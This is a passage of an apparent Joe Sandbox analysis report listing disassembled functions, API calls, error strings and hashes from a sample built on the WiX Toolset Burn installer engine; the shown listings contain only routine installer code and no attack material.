                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,0094E7E8,?,8000FFFF,8000FFFF,00020006,00000000,00000000,00000000,00000000,00000000,00000000,8000FFFF,?), ref: 00945735
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • default, xrefs: 00945672
                                                                                                                                                                                                                                                                            • version.dll, xrefs: 009455E1
                                                                                                                                                                                                                                                                            • Failed to set the %ls registry value to "%ls"., xrefs: 00945677, 009456AB, 009456DC
                                                                                                                                                                                                                                                                            • Failed to create the dependency registry key "%ls"., xrefs: 00945648
                                                                                                                                                                                                                                                                            • Failed to allocate the registry key for dependency "%ls"., xrefs: 00945603
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 00945612, 0094571F
                                                                                                                                                                                                                                                                            • Failed to set the %ls registry value to %d., xrefs: 00945710
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Closelstrlen
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate the registry key for dependency "%ls".$Failed to create the dependency registry key "%ls".$Failed to set the %ls registry value to "%ls".$Failed to set the %ls registry value to %d.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp$default$version.dll
                                                                                                                                                                                                                                                                            • API String ID: 3903209405-20855631
                                                                                                                                                                                                                                                                            • Opcode ID: 6f23483d548456791437f828a000f7534f0326039716647066f5a1e41cf3e301
                                                                                                                                                                                                                                                                            • Instruction ID: dd7cc32da443b9585134548dc4c2556c8239a8e5fcdf4f1e5a40ee296ca91d9b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f23483d548456791437f828a000f7534f0326039716647066f5a1e41cf3e301
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F41D673A41A18FBDF226FD08D46F9F7F79EB84B50F064164FA04791A2D2718E10AB50
                                                                                                                                                                                                                                                                            Function 008FFC95 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 126COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to set last source., xrefs: 008FFDB2
                                                                                                                                                                                                                                                                            • WixBundleLastUsedSource, xrefs: 008FFD5F, 008FFD65, 008FFDA3
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\cache.cpp, xrefs: 008FFDC4
                                                                                                                                                                                                                                                                            • Failed to determine length of relative path., xrefs: 008FFCEF
                                                                                                                                                                                                                                                                            • Failed to trim source folder., xrefs: 008FFD48
                                                                                                                                                                                                                                                                            • Failed to determine length of source path., xrefs: 008FFCC5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Failed to determine length of relative path.$Failed to determine length of source path.$Failed to set last source.$Failed to trim source folder.$WixBundleLastUsedSource$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                                                                                                                            • API String ID: 0-3313679279
                                                                                                                                                                                                                                                                            • Opcode ID: 2339ce6de26a4efd3e3fc9b624c38f80e2310ab1ab3362fca786bdb043a22652
                                                                                                                                                                                                                                                                            • Instruction ID: c5c903c9407de876bb7986380e18ff48ba841eeab98b96fe83a870813e8f4fc5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2339ce6de26a4efd3e3fc9b624c38f80e2310ab1ab3362fca786bdb043a22652
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F941C731A4026DBBDF21EAA9CC46FAF7A79FF45760F110261FB10FA1D1D6B099009791
                                                                                                                                                                                                                                                                            Function 009400B5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 112memoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 009400C9
                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 009400D5
                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 009401C4
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 009401CF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • failed get_nodeValue in XmlGetAttribute(%ls), xrefs: 0094016F
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 00940107, 00940140
                                                                                                                                                                                                                                                                            • failed get_attributes, xrefs: 009400F8
                                                                                                                                                                                                                                                                            • failed getNamedItem in XmlGetAttribute(%ls), xrefs: 00940131
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                                                                                                                                            • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed getNamedItem in XmlGetAttribute(%ls)$failed get_attributes$failed get_nodeValue in XmlGetAttribute(%ls)
                                                                                                                                                                                                                                                                            • API String ID: 760788290-1291303398
                                                                                                                                                                                                                                                                            • Opcode ID: 4cda9bd55df59647fb355f0ee02204328275b1b5ee52188d92882ef663e2c2da
                                                                                                                                                                                                                                                                            • Instruction ID: 4a38cd43764442a97c4c3ca45a100454a0a6659d828b6acc1036004d1a22eaea
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4cda9bd55df59647fb355f0ee02204328275b1b5ee52188d92882ef663e2c2da
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3931E076704219ABDF169F94CC49E6E3779FBC9B01F048058FA05A72A1EB709E41DB50
                                                                                                                                                                                                                                                                            Function 008E643F Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 112COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000105,00000000,00000000,00000105,00000000,00000000,00000000,?,?,?,008E47DC,?,00000000,00000000,00000000,0100147D), ref: 008E648B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate space for current directory.$Failed to get current directory.$Failed to get max length of input buffer.$Failed to reallocate space for current directory.$GetCurrentDirectoryW results never converged.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1611563598-979167295
                                                                                                                                                                                                                                                                            • Opcode ID: 2d535e394fc49132a805b1a12d090716b08bc91a7cc96039e7adb69c01da5f6d
                                                                                                                                                                                                                                                                            • Instruction ID: 36533a9f9f229dc479a84b4962711b015b745a2140eb84d2359af0ce29c64f31
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d535e394fc49132a805b1a12d090716b08bc91a7cc96039e7adb69c01da5f6d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE3123B2B4176977E720861B9C4AFAF2A6CFB97B94F010025BD04FB280F1A4DC1082A0
                                                                                                                                                                                                                                                                            Function 008F079A Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 107COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(008E6CF2,00000000,7D8B5756,008E6CF2,00000000,008E7162,008E7162,008E6DEA,00000000,008E7162,00000000,008E6DEA,008E6CF2,008E7162,008E6DEA,008E6EDE), ref: 008F0814
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008F081F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\search.cpp, xrefs: 008F07D5, 008F0897
                                                                                                                                                                                                                                                                            • Directory search: %ls, did not find path: %ls, reason: 0x%x, xrefs: 008F08AC
                                                                                                                                                                                                                                                                            • Failed to format variable string., xrefs: 008F07FD
                                                                                                                                                                                                                                                                            • Failed to set directory search path variable., xrefs: 008F0850
                                                                                                                                                                                                                                                                            • Failed to initialize file search., xrefs: 008F07C3
                                                                                                                                                                                                                                                                            • Failed while searching directory search: %ls, for path: %ls, xrefs: 008F0885
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AttributesErrorFileLast
                                                                                                                                                                                                                                                                            • String ID: Directory search: %ls, did not find path: %ls, reason: 0x%x$Failed to format variable string.$Failed to initialize file search.$Failed to set directory search path variable.$Failed while searching directory search: %ls, for path: %ls$d:\a\wix4\wix4\src\burn\engine\search.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1799206407-3281098314
                                                                                                                                                                                                                                                                            • Opcode ID: 921b478909095fe3224c4cf706dd0346180f66ec037fda908555c39857e31278
                                                                                                                                                                                                                                                                            • Instruction ID: e94974a9223f81d16c764681c1b4b995357a05fff6ce737b42112e9af656d295
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 921b478909095fe3224c4cf706dd0346180f66ec037fda908555c39857e31278
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0431FB32D4062DBFDB129AA98C46F6E7A24FF00764F110121FE14F6192E2B19D509FD1
                                                                                                                                                                                                                                                                            Function 00947606 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 106COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,00919860,00000000,?), ref: 0094761D
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00919860,00000000,?,?,?,?,?,?,?,?,?,00919D0A,?,?), ref: 0094762B
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: GetProcessHeap.KERNEL32(?,00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E541C
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: RtlAllocateHeap.NTDLL(00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E5423
                                                                                                                                                                                                                                                                            • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,00000001,?,?,00919860,00000000,?), ref: 00947682
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00919860,00000000,?,?,?,?,?,?,?,?,?,00919D0A,?,?), ref: 0094768C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ConfigErrorHeapLastQueryService$AllocateProcess
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate memory to get configuration.$Failed to query service configuration.$Failed to read service configuration.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\svcutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 355237494-3172380343
                                                                                                                                                                                                                                                                            • Opcode ID: f24363b490d76123cf3eaee9edd99922b86313e3168d64f8e3d08831676d49f1
                                                                                                                                                                                                                                                                            • Instruction ID: 6630d366ff09f77686b7251336c4f83b32a9038d9166d85b56f54dd93b9129a6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f24363b490d76123cf3eaee9edd99922b86313e3168d64f8e3d08831676d49f1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49314976B05738B7EB3156D98C4AF6FA95DEF02B90F120014FE08FA280E3A08D0096F1
                                                                                                                                                                                                                                                                            Function 008F0A29 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 104COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(008E6CF2,00000000,7D8B5756,008E6CF2,00000000,008E7162,008E7162,008E6DEA,00000000,008E7162,00000000,008E6DEA,008E6CF2), ref: 008F0AA3
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008F0AAE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • File search: %ls, did not find path: %ls, xrefs: 008F0B33
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\search.cpp, xrefs: 008F0A64, 008F0AEE
                                                                                                                                                                                                                                                                            • Failed to set variable to file search path., xrefs: 008F0B17
                                                                                                                                                                                                                                                                            • Failed to format variable string., xrefs: 008F0A8C
                                                                                                                                                                                                                                                                            • Failed to initialize file search., xrefs: 008F0A52
                                                                                                                                                                                                                                                                            • Failed while searching file search: %ls, for path: %ls, xrefs: 008F0ADC
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AttributesErrorFileLast
                                                                                                                                                                                                                                                                            • String ID: Failed to format variable string.$Failed to initialize file search.$Failed to set variable to file search path.$Failed while searching file search: %ls, for path: %ls$File search: %ls, did not find path: %ls$d:\a\wix4\wix4\src\burn\engine\search.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1799206407-4156759458
                                                                                                                                                                                                                                                                            • Opcode ID: d5881030515990844e0b35c6d2014204a5bc21d5ef873df13f28d8d7e33a63bf
                                                                                                                                                                                                                                                                            • Instruction ID: 2d97fbe47743dd1a13ef43766dfb03f67d7e6d7218048021532216095be7ccca
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d5881030515990844e0b35c6d2014204a5bc21d5ef873df13f28d8d7e33a63bf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D231CC32D40739BFDB129AA98C06F6EBA68FF04768F114111FB14FA192D3B19D509BD1
                                                                                                                                                                                                                                                                            Function 00926302 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 97synchronizationCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,?,00000000,08000000,00000000,00000000,?,?,?,?,?), ref: 0092631B
                                                                                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00926333
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0092637E
                                                                                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(?), ref: 00926395
                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?), ref: 0092639E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to get message from netfx chainer., xrefs: 009263BF
                                                                                                                                                                                                                                                                            • Failed to send files in use message from netfx chainer., xrefs: 009263EF
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\netfxchainer.cpp, xrefs: 00926401
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MutexObjectReleaseSingleWait$Event
                                                                                                                                                                                                                                                                            • String ID: Failed to get message from netfx chainer.$Failed to send files in use message from netfx chainer.$d:\a\wix4\wix4\src\burn\engine\netfxchainer.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2608678126-3113603724
                                                                                                                                                                                                                                                                            • Opcode ID: d0fb7f0d64c2ba7d10c36a32183879c654e0819b32335fefcbfdcb018738874e
                                                                                                                                                                                                                                                                            • Instruction ID: 22ac0b3b2fa17fa9040cebdcb9843771956be7d811d6f89c00b4aefcafd3689a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d0fb7f0d64c2ba7d10c36a32183879c654e0819b32335fefcbfdcb018738874e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF310671600229BFCB119F54DC49EEEBFB8FF15720F008265F925A62A1D7709950DBE0
                                                                                                                                                                                                                                                                            Function 00942587 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 90COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseErrorExecuteHandleLastShell
                                                                                                                                                                                                                                                                            • String ID: <$PDv$ShellExecEx failed with return code: %d$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\shelutil.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 3023784893-1662516666
                                                                                                                                                                                                                                                                            • Opcode ID: 0af6cd49dd03f4b7fb3e55fc7492565fa490ed1bf87c0ae40688dcf299ad50a7
                                                                                                                                                                                                                                                                            • Instruction ID: 88b866315df28d78c42c47bccab6399ca2e03e062da093c732886e2815e808ad
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0af6cd49dd03f4b7fb3e55fc7492565fa490ed1bf87c0ae40688dcf299ad50a7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 023149B6E01219ABDB10DFAADC44E9EBBF8FF98710F01401AF915E7350E77099418BA0
                                                                                                                                                                                                                                                                            Function 008F9839 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 74registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008F7CE9: lstrlenA.KERNEL32(?,00000000,?,00000000,?,?,?,?,swidtag,?,?,?,?,00000000), ref: 008F7D78
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,008E6DA2,00000002,00000001,00000000,00000000,?,?,?,?,?,?,00902F8D,008E6DA2,00000001,00000001), ref: 008F997D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Closelstrlen
                                                                                                                                                                                                                                                                            • String ID: %04u%02u%02u$Failed to write %ls value.$Failed to write software tags.$Failed to write update registration.$InstallDate$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3903209405-1589291871
                                                                                                                                                                                                                                                                            • Opcode ID: a57d35e5c4f44b4aebd5a531e5cc53ba26da8404d508e503bb5236e23830ab3e
                                                                                                                                                                                                                                                                            • Instruction ID: 8b12c3365dc128fda581506bbe2474e7657c3812f23a0ff6a8fc39156cb318bf
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a57d35e5c4f44b4aebd5a531e5cc53ba26da8404d508e503bb5236e23830ab3e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5213530A4031AB6DB219AB5DC0AFBF7AA8FB45B09F000166FF40F51C1D6A48E44C7A1
                                                                                                                                                                                                                                                                            Function 008EA669 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 116stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 008EA67C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
